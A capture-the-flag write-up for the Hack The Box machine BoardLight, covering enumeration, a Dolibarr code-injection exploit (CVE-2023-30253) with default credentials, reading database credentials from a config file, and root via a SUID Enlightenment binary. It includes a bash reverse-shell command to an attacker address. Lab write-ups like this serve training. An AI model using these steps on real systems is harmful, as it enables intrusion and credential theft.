BoardLight

Posted 2026-03-06Easy Linux HTB
HTBLinuxEasyCVESUID
BoardLight

Reconnaissance

We start with a full port scan using nmap:

</> bash
nmap -sC -sV -oN nmap/initial 10.10.11.11

The scan reveals two open ports:

  • Port 22 — SSH (OpenSSH 8.9p1)
  • Port 80 — HTTP (Apache 2.4.54)

Enumeration

Navigating to the web server on port 80, we find a corporate website for "BoardLight". Inspecting the page source reveals a hostname: board.htb.

After adding it to /etc/hosts, we perform subdomain enumeration:

</> bash
ffuf -u http://board.htb -H "Host: FUZZ.board.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 6243

This discovers crm.board.htb, which hosts a Dolibarr 17.0.0 instance.

Foothold

Dolibarr 17.0.0 is vulnerable to CVE-2023-30253 — a PHP code injection vulnerability that allows remote code execution through the website pages editor.

Default credentials admin:admin grant access to the admin panel. From there, we exploit the vulnerability:

</> bash
python3 CVE-2023-30253.py --url http://crm.board.htb --login admin --password admin -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

We catch a reverse shell as www-data.

Lateral Movement

Checking the Dolibarr configuration file:

</> bash
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

We find database credentials. Using them to query MySQL, we discover a password hash for user larissa. After cracking it, we SSH in as larissa and grab the user flag.

Privilege Escalation

Checking for SUID binaries:

</> bash
find / -perm -4000 2>/dev/null

We find an unusual SUID binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys. This binary is part of the Enlightenment desktop environment and is vulnerable to CVE-2022-37706.

Running the exploit gives us a root shell:

</> bash
bash exploit.sh
whoami
# root

Root flag captured! 🏴